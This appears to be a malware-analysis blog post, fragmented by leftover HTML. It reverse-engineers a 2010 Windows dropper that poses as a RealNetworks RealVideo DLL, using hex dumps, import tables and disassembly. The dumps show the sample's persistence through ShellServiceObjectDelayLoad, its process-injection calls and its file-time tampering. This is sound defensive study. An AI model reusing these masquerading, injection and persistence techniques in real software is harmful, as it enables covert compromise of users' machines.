[IMAGE_RESOURCE_DIRECTORY_ENTRY]\n Name: 0x800000A0\n OffsetToData: 0x80000020\n [IMAGE_RESOURCE_DIRECTORY]\n Characteristics: 0x0 \n TimeDateStamp: 0x0 [Thu Jan 01 00:00:00 1970 UTC]\n MajorVersion: 0x0 \n MinorVersion: 0x0 \n NumberOfNamedEntries: 0x0 \n NumberOfIdEntries: 0x1 \n Id: [0x1]\n [IMAGE_RESOURCE_DIRECTORY_ENTRY]\n Name: 0x1 \n OffsetToData: 0x80000050\n [IMAGE_RESOURCE_DIRECTORY]\n Characteristics: 0x0 \n TimeDateStamp: 0x0 [Thu Jan 01 00:00:00 1970 UTC]\n MajorVersion: 0x0 \n MinorVersion: 0x0 \n NumberOfNamedEntries: 0x0 \n NumberOfIdEntries: 0x1 \n [IMAGE_RESOURCE_DIRECTORY_ENTRY]\n Name: 0x409 \n OffsetToData: 0x80 \n [IMAGE_RESOURCE_DATA_ENTRY]\n OffsetToData: 0x50B0 \n Size: 0x400 \n CodePage: 0x0 \n Reserved: 0x0 \n\n Id: [0x2] (RT_BITMAP)\n [IMAGE_RESOURCE_DIRECTORY_ENTRY]\n Name: 0x2 \n OffsetToData: 0x80000038\n [IMAGE_RESOURCE_DIRECTORY]\n Characteristics: 0x0 \n TimeDateStamp: 0x0 [Thu Jan 01 00:00:00 1970 UTC]\n MajorVersion: 0x0 \n MinorVersion: 0x0 \n NumberOfNamedEntries: 0x0 \n NumberOfIdEntries: 0x1 \n Id: [0x1]\n [IMAGE_RESOURCE_DIRECTORY_ENTRY]\n Name: 0x1 \n OffsetToData: 0x80000068\n [IMAGE_RESOURCE_DIRECTORY]\n Characteristics: 0x0 \n TimeDateStamp: 0x0 [Thu Jan 01 00:00:00 1970 UTC]\n MajorVersion: 0x0 \n MinorVersion: 0x0 \n NumberOfNamedEntries: 0x0 \n NumberOfIdEntries: 0x1 \n [IMAGE_RESOURCE_DIRECTORY_ENTRY]\n Name: 0x409 \n OffsetToData: 0x90 \n [IMAGE_RESOURCE_DATA_ENTRY]\n OffsetToData: 0x54B0 \n Size: 0xA6FC \n CodePage: 0x0 \n Reserved: 0x0 <\/pre>\n\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n00339D28 C6 01 D7 01 E3 01 ED 01 \u00c6\u00d7\u00e3\u00ed\n00339D30 FE 01 0A 02 19 02 25 02 \u00fe.%\n00339D38 3F 02 4B 02 5E 02 73 02 ?K^s\n00339D40 86 02 97 02 A4 02 B2 02 \u2020\u2014\u00a4\u00b2\n00339D48 BE 02 CF 02 DA 02 E7 02 \u00be\u00cf\u00da\u00e7\n00339D50 F3 02 04 03 0A 03 1B 03 \u00f3.\n00339D58 2B 03 38 03 47 03 53 03 +8GS\n00339D60 5D 03 70 03 7D 03 89 03 ]p}\u2030\n00339D68 97 03 A4 03 B1 03 BE 03 \u2014\u00a4\u00b1\u00be\n00339D70 CD 03 DD 03 E9 03 F5 03 \u00cd\u00dd\u00e9\u00f5\n00339D78 70 6E 65 6E 33 32 36 30 pnen3260\n00339D80 2E 64 6C 6C 00 63 61 6C .dll.cal\n00339D88 63 00 6F 73 6B 00 61 64 c.osk.ad\n00339D90 76 61 70 69 33 32 00 5F vapi32._\n00339D98 21 52 4B 55 23 50 4E 50 !RKU#PNP\n00339DA0 23 30 39 30 39 32 31 21 #090921!\n00339DA8 5F 00 52 45 53 42 49 4E _.RESBIN\n00339DB0 00 43 4C 53 49 44 5C 00 .CLSID\\.\n00339DB8 33 32 2E 00 53 4F 46 54 32..SOFT\n00339DC0 57 41 52 45 5C 4D 69 63 WARE\\Mic\n00339DC8 72 6F 73 6F 66 74 5C 57 rosoft\\W\n00339DD0 69 6E 64 6F 77 73 5C 43 indows\\C\n00339DD8 75 72 72 65 6E 74 56 65 urrentVe\n00339DE0 72 73 69 6F 6E 5C 53 68 rsion\\Sh\n00339DE8 65 6C 6C 53 65 72 76 69 ellServi\n00339DF0 63 65 4F 62 6A 65 63 74 ceObject\n00339DF8 44 65 6C 61 79 4C 6F 61 DelayLoa\n00339E00 64 00 41 70 61 72 74 6D d.Apartm\n00339E08 65 6E 74 00 7B 41 44 32 ent.{AD2\n00339E10 36 41 43 35 46 2D 38 34 6AC5F-84\n00339E18 32 31 2D 34 31 39 43 2D 21-419C-\n00339E20 38 36 39 32 2D 45 44 31 8692-ED1\n00339E28 46 45 37 34 44 30 46 45 FE74D0FE\n00339E30 38 7D 00 54 68 72 65 61 8}.Threa\n00339E38 64 69 6E 67 4D 6F 64 65 dingMode\n00339E40 6C 00 52 65 61 6C 43 6F l.RealCo\n00339E48 64 65 63 00 53 68 65 6C dec.Shel\n00339E50 6C 5F 54 72 61 79 57 6E l_TrayWn\n00339E58 64 00 6E 74 64 6C 6C 00 d.ntdll.\n00339E60 52 74 6C 41 64 6A 75 73 RtlAdjus\n00339E68 74 50 72 69 76 69 6C 65 tPrivile\n00339E70 67 65 00 75 73 65 72 33 ge.user3\n00339E78 32 00 47 65 74 54 61 73 2.GetTas\n00339E80 6B 6D 61 6E 57 69 6E 64 kmanWind\n00339E88 6F 77 00 72 6D 6F 63 33 ow.rmoc3\n00339E90 32 36 30 2E 74 6C 62 00 260.tlb.\n00339E98 61 74 72 63 33 32 2E 64 atrc32.d\n00339EA0 6C 6C 00 25 50 72 6F 67 ll.%Prog\n00339EA8 72 61 6D 46 69 6C 65 73 ramFiles\n00339EB0 25 5C 52 65 61 6C 5C 00 %\\Real\\.\n00339EB8 25 53 79 73 74 65 6D 52 %SystemR\n00339EC0 6F 6F 74 25 5C 73 79 73 oot%\\sys\n00339EC8 74 65 6D 33 32 5C 00 73 tem32\\.s\n00339ED0 66 63 2E 64 6C 6C 00 53 fc.dll.S\n00339ED8 66 63 49 73 46 69 6C 65 fcIsFile\n00339EE0 50 72 6F 74 65 63 74 65 Protecte\n00339EE8 64 00 50 6C 75 67 69 6E d.Plugin\n00339EF0 32 61 2E 53 65 63 74 69 2a.Secti\n00339EF8 6F 6E 00 46 69 6E 64 57 on.FindW\n00339F00 69 6E 64 6F 77 41 00 61 indowA.a\n00339F08 63 74 78 70 72 78 79 2E ctxprxy.\n00339F10 64 6C 6C 00 6B 65 72 6E dll.kern\n00339F18 65 6C 33 32 2E 64 6C 6C el32.dll\n00339F20 00 5C 49 6E 70 72 6F 63 .\\Inproc\n00339F28 53 65 72 76 65 72 33 32 Server32\n00339F30 00 47 65 74 54 65 6D 70 .GetTemp\n00339F38 50 61 74 68 41 00 47 65 PathA.Ge\n00339F40 74 54 65 6D 70 46 69 6C tTempFil\n00339F48 65 4E 61 6D 65 41 00 43 eNameA.C\n00339F50 6C 6F 73 65 48 61 6E 64 loseHand\n00339F58 6C 65 00 43 6F 70 79 46 le.CopyF\n00339F60 69 6C 65 41 00 43 72 65 ileA.Cre\n00339F68 61 74 65 44 69 72 65 63 ateDirec\n00339F70 74 6F 72 79 41 00 43 72 toryA.Cr\n00339F78 65 61 74 65 46 69 6C 65 eateFile\n00339F80 41 00 43 72 65 61 74 65 A.Create\n00339F88 50 72 6F 63 65 73 73 41 ProcessA\n00339F90 00 44 65 6C 65 74 65 46 .DeleteF\n00339F98 69 6C 65 41 00 45 78 70 ileA.Exp\n00339FA0 61 6E 64 45 6E 76 69 72 andEnvir\n00339FA8 6F 6E 6D 65 6E 74 53 74 onmentSt\n00339FB0 72 69 6E 67 73 41 00 46 ringsA.F\n00339FB8 72 65 65 4C 69 62 72 61 reeLibra\n00339FC0 72 79 00 47 65 74 46 69 ry.GetFi\n00339FC8 6C 65 41 74 74 72 69 62 leAttrib\n00339FD0 75 74 65 73 41 00 47 65 utesA.Ge\n00339FD8 74 46 69 6C 65 41 74 74 tFileAtt\n00339FE0 72 69 62 75 74 65 73 45 ributesE\n00339FE8 78 41 00 47 65 74 4D 6F xA.GetMo\n00339FF0 64 75 6C 65 46 69 6C 65 duleFile\n00339FF8 4E 61 6D 65 41 00 47 65 NameA.Ge\n0033A000 74 54 68 72 65 61 64 43 tThreadC\n0033A008 6F 6E 74 65 78 74 00 49 ontext.I\n0033A010 73 42 61 64 52 65 61 64 sBadRead\n0033A018 50 74 72 00 4D 61 70 56 Ptr.MapV\n0033A020 69 65 77 4F 66 46 69 6C iewOfFil\n0033A028 65 00 4D 6F 76 65 46 69 e.MoveFi\n0033A030 6C 65 45 78 41 00 4F 70 leExA.Op\n0033A038 65 6E 46 69 6C 65 4D 61 enFileMa\n0033A040 70 70 69 6E 67 41 00 4F ppingA.O\n0033A048 70 65 6E 4D 75 74 65 78 penMutex\n0033A050 41 00 52 65 73 75 6D 65 A.Resume\n0033A058 54 68 72 65 61 64 00 53 Thread.S\n0033A060 65 74 46 69 6C 65 54 69 etFileTi\n0033A068 6D 65 00 53 65 74 54 68 me.SetTh\n0033A070 72 65 61 64 43 6F 6E 74 readCont\n0033A078 65 78 74 00 53 6C 65 65 ext.Slee\n0033A080 70 00 54 65 72 6D 69 6E p.Termin\n0033A088 61 74 65 50 72 6F 63 65 ateProce\n0033A090 73 73 00 55 6E 6D 61 70 ss.Unmap\n0033A098 56 69 65 77 4F 66 46 69 ViewOfFi\n0033A0A0 6C 65 00 56 69 72 74 75 le.Virtu\n0033A0A8 61 6C 41 6C 6C 6F 63 00 alAlloc.\n0033A0B0 56 69 72 74 75 61 6C 41 VirtualA\n0033A0B8 6C 6C 6F 63 45 78 00 56 llocEx.V\n0033A0C0 69 72 74 75 61 6C 46 72 irtualFr\n0033A0C8 65 65 00 57 72 69 74 65 ee.Write\n0033A0D0 46 69 6C 65 00 57 72 69 File.Wri\n0033A0D8 74 65 50 72 6F 63 65 73 teProces\n0033A0E0 73 4D 65 6D 6F 72 79 00 sMemory.\n0033A0E8 4C 6F 61 64 4C 69 62 72 LoadLibr\n0033A0F0 61 72 79 41 00 45 78 69 aryA.Exi\n0033A0F8 74 50 72 6F 63 65 73 73 tProcess\n0033A100 00 46 69 6E 64 52 65 73 .FindRes\n0033A108 6F 75 72 63 65 41 00 46 ourceA.F\n0033A110 72 65 65 52 65 73 6F 75 reeResou\n0033A118 72 63 65 00 4C 6F 61 64 rce.Load\n0033A120 52 65 73 6F 75 72 63 65 Resource\n0033A128 00 4C 6F 63 6B 52 65 73 .LockRes\n0033A130 6F 75 72 63 65 00 53 69 ource.Si\n0033A138 7A 65 6F 66 52 65 73 6F zeofReso\n0033A140 75 72 63 65 00 52 65 67 urce.Reg\n0033A148 43 72 65 61 74 65 4B 65 CreateKe\n0033A150 79 45 78 41 00 52 65 67 yExA.Reg\n0033A158 43 6C 6F 73 65 4B 65 79 CloseKey\n0033A160 00 52 65 67 4F 70 65 6E .RegOpen\n0033A168 4B 65 79 41 00 52 65 67 KeyA.Reg\n0033A170 53 65 74 56 61 6C 75 65 SetValue\n0033A178 45 78 41 00 00 ExA..<\/pre>\n\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n00401538 \/$ 55 PUSH EBP\n00401539 |. 8BEC MOV EBP,ESP\n0040153B |. 81EC 34010000 SUB ESP,134\n00401541 |. 53 PUSH EBX\n00401542 |. 56 PUSH ESI\n00401543 |. 57 PUSH EDI\n00401544 |. 6A 02 PUSH 2\n00401546 |. 33F6 XOR ESI,ESI\n00401548 |. 6A 01 PUSH 1\n0040154A |. 56 PUSH ESI\n0040154B |. 8975 FC MOV DWORD PTR SS:[EBP-4],ESI\n0040154E |. FF15 AC404000 CALL DWORD PTR DS:[4040AC] ; kernel32.FindResourceA\n00401554 |. 8BF8 MOV EDI,EAX\n00401556 |. 57 PUSH EDI\n00401557 |. 56 PUSH ESI\n00401558 |. FF15 B4404000 CALL DWORD PTR DS:[4040B4] ; kernel32.LoadResource\n0040155E |. 8BD8 MOV EBX,EAX\n00401560 |. 3BDE CMP EBX,ESI\n00401562 |. 895D F4 MOV DWORD PTR SS:[EBP-C],EBX\n00401565 |. 0F84 05010000 JE l.00401670\n0040156B |. 3935 20404000 CMP DWORD PTR DS:[404020],ESI\n00401571 |. 0F84 F9000000 JE l.00401670\n00401577 |. 57 PUSH EDI\n00401578 |. 56 PUSH ESI\n00401579 |. FF15 BC404000 CALL DWORD PTR DS:[4040BC] ; kernel32.SizeofResource\n0040157F |. 53 PUSH EBX\n00401580 |. FF15 B8404000 CALL DWORD PTR DS:[4040B8] ; kernel32.SetHandleCount\n00401586 |. 6A 04 PUSH 4\n00401588 |. 68 00100000 PUSH 1000\n0040158D |. 68 00000100 PUSH 10000 ; UNICODE "ALLUSERSPROFILE=C:\\Documents and Settings\\All Users"\n00401592 |. 56 PUSH ESI\n00401593 |. FF15 80404000 CALL DWORD PTR DS:[404080] ; kernel32.VirtualAlloc\n00401599 |. 8BF8 MOV EDI,EAX\n0040159B |. 3BFE CMP EDI,ESI\n0040159D |. 0F84 C6000000 JE l.00401669\n004015A3 |. 57 PUSH EDI\n004015A4 |. 56 PUSH ESI\n004015A5 |. 83C3 28 ADD EBX,28\n004015A8 |. 53 PUSH EBX\n004015A9 |. E8 0DFEFFFF CALL l.004013BB\n004015AE |. 83C4 0C ADD ESP,0C\n004015B1 |. 3D 30900000 CMP EAX,9030\n004015B6 |. 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX\n004015B9 |. 0F86 9A000000 JBE l.00401659\n004015BF |. 68 E0000000 PUSH 0E0 ; \/n = E0 (224.)\n004015C4 |. FF35 20404000 PUSH DWORD PTR DS:[404020] ; |src = l.004053D0\n004015CA |. 8D87 30900000 LEA EAX,DWORD PTR DS:[EDI+9030] ; |\n004015D0 |. 50 PUSH EAX ; |dest\n004015D1 |. E8 EE0B0000 CALL <<\/span>JMP.<\/span>&MSVCRT<\/span>.memcpy<\/span>><\/span> ; \\memcpy\n004015D6 |. 83C4 0C ADD ESP,0C\n004015D9 |. 56 PUSH ESI\n004015DA |. 56 PUSH ESI\n004015DB |. 6A 03 PUSH 3\n004015DD |. 56 PUSH ESI\n004015DE |. 56 PUSH ESI\n004015DF |. 68 000000C0 PUSH C0000000\n004015E4 |. FF75 08 PUSH DWORD PTR SS:[EBP+8]\n004015E7 |. FF15 38404000 CALL DWORD PTR DS:[404038] ; kernel32.CreateFileA\n004015ED |. 8BD8 MOV EBX,EAX\n004015EF |. 83FB FF CMP EBX,-1\n004015F2 |. 74 65 JE SHORT l.00401659\n004015F4 |. 56 PUSH ESI\n004015F5 |. 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]\n004015F8 |. 50 PUSH EAX\n004015F9 |. FF75 F8 PUSH DWORD PTR SS:[EBP-8]\n004015FC |. 57 PUSH EDI\n004015FD |. 53 PUSH EBX\n004015FE |. FF15 8C404000 CALL DWORD PTR DS:[40408C] ; kernel32.WriteFile\n00401604 |. 6A 10 PUSH 10\n00401606 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\n00401609 |. E8 C3FEFFFF CALL l.004014D1\n0040160E |. 59 POP ECX\n0040160F |. 50 PUSH EAX ; \/pModule\n00401610 |. FF15 04304000 CALL DWORD PTR DS:[<<\/span>&KERNEL32.GetModuleHandleA><\/span>] ; \\GetModuleHandleA\n00401616 |. 68 04010000 PUSH 104\n0040161B |. 8D8D CCFEFFFF LEA ECX,DWORD PTR SS:[EBP-134]\n00401621 |. 51 PUSH ECX\n00401622 |. 50 PUSH EAX\n00401623 |. FF15 4C404000 CALL DWORD PTR DS:[40404C] ; kernel32.GetModuleFileNameA\n00401629 |. 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]\n0040162C |. 50 PUSH EAX\n0040162D |. 56 PUSH ESI\n0040162E |. 8D85 CCFEFFFF LEA EAX,DWORD PTR SS:[EBP-134]\n00401634 |. 50 PUSH EAX\n00401635 |. FF15 48404000 CALL DWORD PTR DS:[404048] ; kernel32.GetFileAttributesExA\n0040163B |. 85C0 TEST EAX,EAX\n0040163D |. 74 13 JE SHORT l.00401652\n0040163F |. 8D45 E4 LEA EAX,DWORD PTR SS:[EBP-1C]\n00401642 |. 50 PUSH EAX\n00401643 |. 8D45 DC LEA EAX,DWORD PTR SS:[EBP-24]\n00401646 |. 50 PUSH EAX\n00401647 |. 8D45 D4 LEA EAX,DWORD PTR SS:[EBP-2C]\n0040164A |. 50 PUSH EAX\n0040164B |. 53 PUSH EBX\n0040164C |. FF15 6C404000 CALL DWORD PTR DS:[40406C] ; kernel32.SetFileTime\n00401652 |> 53 PUSH EBX\n00401653 |. FF15 2C404000 CALL DWORD PTR DS:[40402C] ; kernel32.CloseHandle\n00401659 |> 68 00800000 PUSH 8000\n0040165E |. 56 PUSH ESI\n0040165F |. 57 PUSH EDI\n00401660 |. FF15 88404000 CALL DWORD PTR DS:[404088] ; kernel32.VirtualFree\n00401666 |. 8B5D F4 MOV EBX,DWORD PTR SS:[EBP-C]\n00401669 |> 53 PUSH EBX\n0040166A |. FF15 B0404000 CALL DWORD PTR DS:[4040B0] ; kernel32.FreeResource\n00401670 |> 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\n00401673 |. 5F POP EDI\n00401674 |. 5E POP ESI\n00401675 |. 5B POP EBX\n00401676 |. C9 LEAVE\n00401677 \\. C3 RETN<\/pre>\n\n
<\/a><\/p>\n\n
<\/a><\/p>\n<\/a><\/p>\n\n
<\/a><\/p>\nLength Of Struc: 0294h\nLength Of Value: 0034h\nType Of Struc: 0000h\nInfo: VS_VERSION_INFO\nSignature: FEEF04BDh\nStruc Version: 1.0\nFile Version: 6.0.7.4085\nProduct Version: 6.0.7.4085\nFile Flags Mask: 0.0\nFile Flags: \nFile OS: WINDOWS32\nFile Type: DLL\nFile SubType: UNKNOWN\nFile Date: 00:00:00 00\/00\/0000\n\nStruc has Child(ren). Size: 568 bytes.\nChild Type: StringFileInfo\nLanguage\/Code Page: 1033\/1200\nCompanyName: RealNetworks, Inc.\nFileDescription: RealVideo\nFileVersion: 6.0.7.4085\nLegalCopyright: Copyright \u00a9 RealNetworks, Inc. 1995-2002\nProductName: RealVideo (32-bit) \nProductVersion: 6.0.7.4085\n\nChild Type: VarFileInfo\nTranslation: 1033\/1200<\/pre>\n
<\/a><\/p>\n<\/a><\/p>\n\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\nDecember 2nd, 2010 21:43:59 GMT+1 - stage 3 : the .tmp file<\/h3>\n
10009000 RegQueryValueA ADVAPI32\n10009004 RegCreateKeyExA ADVAPI32\n10009008 InitializeSecurityDescriptor ADVAPI32\n1000900C SetSecurityDescriptorDacl ADVAPI32\n10009010 RegDeleteValueA ADVAPI32\n10009014 RegOpenKeyA ADVAPI32\n10009018 RegSetValueExA ADVAPI32\n1000901C RegOpenKeyExA ADVAPI32\n10009020 RegQueryValueExA ADVAPI32\n10009024 RegCloseKey ADVAPI32\n10009028 RegEnumValueA ADVAPI32\n10009030 LCMapStringW KERNEL32\n10009034 GetCurrentProcess KERNEL32\n10009038 LCMapStringA KERNEL32\n1000903C GetSystemInfo KERNEL32\n10009040 GetLocaleInfoA KERNEL32\n10009044 GetCPInfo KERNEL32\n10009048 GetStringTypeA KERNEL32\n1000904C GetStringTypeW KERNEL32\n10009050 QueryPerformanceCounter KERNEL32\n10009054 GetTickCount KERNEL32\n10009058 GetCurrentThreadId KERNEL32\n1000905C GetSystemTimeAsFileTime KERNEL32\n10009060 GetACP KERNEL32\n10009064 GetOEMCP KERNEL32\n10009068 WideCharToMultiByte KERNEL32\n1000906C CreateMutexA KERNEL32\n10009070 ResetEvent KERNEL32\n10009074 VirtualFree KERNEL32\n10009078 CreateProcessA KERNEL32\n1000907C GetStartupInfoA KERNEL32\n10009080 LeaveCriticalSection KERNEL32\n10009084 EnterCriticalSection KERNEL32\n10009088 Sleep KERNEL32\n1000908C WaitForSingleObject KERNEL32\n10009090 TerminateProcess KERNEL32\n10009094 WriteProcessMemory KERNEL32\n10009098 VirtualAllocEx KERNEL32\n1000909C GetThreadContext KERNEL32\n100090A0 lstrcpynA KERNEL32\n100090A4 CloseHandle KERNEL32\n100090A8 ResumeThread KERNEL32\n100090AC FindClose KERNEL32\n100090B0 FindNextFileA KERNEL32\n100090B4 FindFirstFileA KERNEL32\n100090B8 GetModuleFileNameA KERNEL32\n100090BC SetEvent KERNEL32\n100090C0 lstrcatA KERNEL32\n100090C4 lstrlenA KERNEL32\n100090C8 lstrcpyA KERNEL32\n100090CC VirtualAlloc KERNEL32\n100090D0 FreeLibrary KERNEL32\n100090D4 GetCurrentProcessId KERNEL32\n100090D8 GetProcAddress KERNEL32\n100090DC ExitThread KERNEL32\n100090E0 CreateThread KERNEL32\n100090E4 InitializeCriticalSection KERNEL32\n100090E8 CreateEventA KERNEL32\n100090EC CreateDirectoryA KERNEL32\n100090F0 GetFileAttributesA KERNEL32\n100090F4 LocalFree KERNEL32\n100090F8 GetModuleHandleA KERNEL32\n100090FC SetUnhandledExceptionFilter KERNEL32\n10009100 LocalAlloc KERNEL32\n10009104 GetLastError KERNEL32\n10009108 MoveFileExA KERNEL32\n1000910C LoadLibraryA KERNEL32\n10009110 CopyFileA KERNEL32\n10009114 ExpandEnvironmentStringsA KERNEL32\n10009118 GetVolumeInformationA KERNEL32\n1000911C FreeLibraryAndExitThread KERNEL32\n10009120 DisableThreadLibraryCalls KERNEL32\n10009124 WriteFile KERNEL32\n10009128 CreateFileA KERNEL32\n1000912C DeleteFileA KERNEL32\n10009130 lstrcmpiA KERNEL32\n10009134 GetLocalTime KERNEL32\n10009138 GetSystemDefaultLCID KERNEL32\n1000913C IsBadReadPtr KERNEL32\n10009140 ExitProcess KERNEL32\n10009144 lstrcmpA KERNEL32\n10009148 VirtualProtect KERNEL32\n1000914C VirtualQuery KERNEL32\n10009150 LoadLibraryExW KERNEL32\n10009154 GetSystemDirectoryA KERNEL32\n10009158 SetFileAttributesA KERNEL32\n1000915C GetTempFileNameA KERNEL32\n10009160 ReadFile KERNEL32\n10009164 GetFileSize KERNEL32\n10009168 SetFilePointer KERNEL32\n1000916C Process32Next KERNEL32\n10009170 Process32First KERNEL32\n10009174 CreateToolhelp32Snapshot KERNEL32\n10009178 Thread32Next KERNEL32\n1000917C OpenThread KERNEL32\n10009180 Thread32First KERNEL32\n10009184 GetTempPathA KERNEL32\n10009188 SetFileTime KERNEL32\n1000918C GetFileTime KERNEL32\n10009190 OpenProcess KERNEL32\n10009194 MultiByteToWideChar KERNEL32\n10009198 MapViewOfFile KERNEL32\n1000919C CreateFileMappingA KERNEL32\n100091A0 IsBadWritePtr KERNEL32\n100091A4 FreeResource KERNEL32\n100091A8 LockResource KERNEL32\n100091AC LoadResource KERNEL32\n100091B0 SizeofResource KERNEL32\n100091B4 FindResourceA KERNEL32\n100091B8 HeapAlloc KERNEL32\n100091BC GetProcessHeap KERNEL32\n100091C0 HeapFree KERNEL32\n100091C4 RtlUnwind KERNEL32\n100091C8 InterlockedExchange KERNEL32\n100091D0 wvsprintfA USER32 \n100091D4 GetWindowThreadProcessId USER32 \n100091D8 IsWindow USER32 \n100091DC SendMessageA USER32 \n100091E0 RegisterClassExA USER32 \n100091E4 CreateWindowExA USER32 \n100091E8 MoveWindow USER32 \n100091EC ShowWindow USER32 \n100091F0 GetMessageA USER32 \n100091F4 TranslateMessage USER32 \n100091F8 DispatchMessageA USER32 \n100091FC PostQuitMessage USER32 \n10009200 DefWindowProcA USER32 \n10009204 KillTimer USER32 \n10009208 SetTimer USER32 <\/pre>\n
\n
DllCanUnloadNow 10002154 1\nDllGetClassObject 10002126 2\nDllRegisterServer 10001EDF 3\nDllUnregisterServer 10001EDF 4\nRMOC3260_5 10001EE2 5\nRMOC3260_6 1000215A 6\nRMOC3260_7 10004EF2 7\nDllEntryPoint 10005A69 <\/pre>\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n00402017 |. 85C0 TEST EAX,EAX\n00402019 |. 0F85 69010000 JNZ l.00402188<\/pre>\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n00401D4B \/$ E8 ACFFFFFF CALL l.00401CFC\n00401D50 |. 85C0 TEST EAX,EAX\n00401D52 |. 74 04 JE SHORT l.00401D58\n00401D54 |> 33C0 XOR EAX,EAX\n00401D56 |. 40 INC EAX\n00401D57 |. C3 RETN\n00401D58 |> E8 B6FFFFFF CALL l.00401D13\n00401D5D |. 85C0 TEST EAX,EAX\n00401D5F |.^75 F3 JNZ SHORT l.00401D54\n00401D61 |. E8 3DFFFFFF CALL l.00401CA3\n00401D66 |. 85C0 TEST EAX,EAX\n00401D68 |.^75 EA JNZ SHORT l.00401D54\n00401D6A |. E8 C4FEFFFF CALL l.00401C33\n00401D6F |. F7D8 NEG EAX\n00401D71 |. 1BC0 SBB EAX,EAX\n00401D73 |. F7D8 NEG EAX\n00401D75 \\. C3 RETN<\/pre>\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n\n
\n
\n <\/a> <\/li>\n<\/ul>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n\n
<\/a><\/p>\n<\/a>
\n
<\/a>(We have seen function 0x00402162 before - the function will release the library (tmp), delete the tmp file, and free memory. I labeled the function so it would be easier to recognize.)<\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/h3>\n
0012FB20 00000000 ....\n0012FB24 00004289 \u2030B..\n0012FB28 00380000 ..8.\n0012FB2C FFFFFFFF \u00ff\u00ff\u00ff\u00ff\n0012FB30 00380000 ..8.\n0012FB34 00000000 ....\n0012FB38 FFFFFC00 .\u00fc\u00ff\u00ff\n0012FB3C 00380000 ..8.\n0012FB40 \/0012FBA4 \u00a4\u00fb.\n0012FB44 |100059A1 \u00a1Y. RETURN to 4E.100059A1 from 4E.10002E38<\/pre>\n
<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n<\/a><\/p>\n00394000 C4 46 00 00 DA 46 00 00 EA 46 00 00 02 47 00 00 \u00c4F..\u00daF..\u00eaF..G..\n00394010 18 47 00 00 30 47 00 00 40 47 00 00 52 47 00 00 G..0G..@G..RG..\n00394020 60 47 00 00 6E 47 00 00 82 47 00 00 92 47 00 00 `G..nG..\u201aG..\u2019G..\n00394030 A2 47 00 00 B4 47 00 00 C4 47 00 00 DC 47 00 00 \u00a2G..\u00b4G..\u00c4G..\u00dcG..\n00394040 F0 47 00 00 10 48 00 00 28 48 00 00 00 00 00 00 \u00f0G..H..(H......\n00394050 48 48 00 00 5C 48 00 00 6A 48 00 00 7A 48 00 00 HH..\\H..jH..zH..\n00394060 86 48 00 00 94 48 00 00 A6 48 00 00 C2 48 00 00 \u2020H..\u201dH..\u00a6H..\u00c2H..\n00394070 D0 48 00 00 E6 48 00 00 F6 48 00 00 06 49 00 00 \u00d0H..\u00e6H..\u00f6H..I..\n00394080 16 49 00 00 2C 49 00 00 40 49 00 00 4C 49 00 00 I..,I..@I..LI..\n00394090 5E 49 00 00 6A 49 00 00 76 49 00 00 84 49 00 00 ^I..jI..vI..\u201eI..\n003940A0 92 49 00 00 9E 49 00 00 A6 49 00 00 B2 49 00 00 \u2019I..\u017eI..\u00a6I..\u00b2I..\n003940B0 BE 49 00 00 CE 49 00 00 EA 49 00 00 F8 49 00 00 \u00beI..\u00ceI..\u00eaI..\u00f8I..\n003940C0 0A 4A 00 00 1A 4A 00 00 2E 4A 00 00 40 4A 00 00 .J..J...J..@J..\n003940D0 56 4A 00 00 6C 4A 00 00 82 4A 00 00 94 4A 00 00 VJ..lJ..\u201aJ..\u201dJ..\n003940E0 A8 4A 00 00 B8 4A 00 00 C6 4A 00 00 D6 4A 00 00 \u00a8J..\u00b8J..\u00c6J..\u00d6J..\n003940F0 EA 4A 00 00 FC 4A 00 00 12 4B 00 00 20 4B 00 00 \u00eaJ..\u00fcJ..K.. K..\n00394100 32 4B 00 00 40 4B 00 00 56 4B 00 00 6A 4B 00 00 2K..@K..VK..jK..\n00394110 76 4B 00 00 84 4B 00 00 9C 4B 00 00 B0 4B 00 00 vK..\u201eK..\u0153K..\u00b0K..\n00394120 C4 4B 00 00 D4 4B 00 00 EA 4B 00 00 00 00 00 00 \u00c4K..\u00d4K..\u00eaK......\n00394130 08 4C 00 00 12 4C 00 00 1C 4C 00 00 26 4C 00 00 L..L..L..&L..\n00394140 2E 4C 00 00 38 4C 00 00 4E 4C 00 00 5A 4C 00 00 .L..8L..NL..ZL..\n00394150 00 00 00 00 00 00 00 00 5C 5C 2E 5C 53 54 4D 33 ........\\\\.\\STM3\n00394160 32 4B 72 6E 6C 00 00 00 77 75 61 75 73 65 72 76 2Krnl...wuauserv\n00394170 00 00 00 00 6B 65 72 6E 65 6C 33 32 00 00 00 00 ....kernel32....\n00394180 6E 74 64 6C 6C 2E 64 6C 6C 00 00 00 53 61 66 65 ntdll.dll...Safe\n00394190 33 32 2E 4D 75 74 61 6E 74 4E 61 6D 65 00 00 00 32.MutantName...\n003941A0 53 61 66 65 33 32 2E 45 76 65 6E 74 00 00 00 00 Safe32.Event....\n003941B0 2E 63 72 74 00 00 00 00 2E 33 38 36 00 00 00 00 .crt.....386....\n003941C0 5C 70 73 61 70 69 2E 64 6C 6C 00 00 25 53 79 73 \\psapi.dll..%Sys\n003941D0 74 65 6D 72 6F 6F 74 25 5C 73 79 73 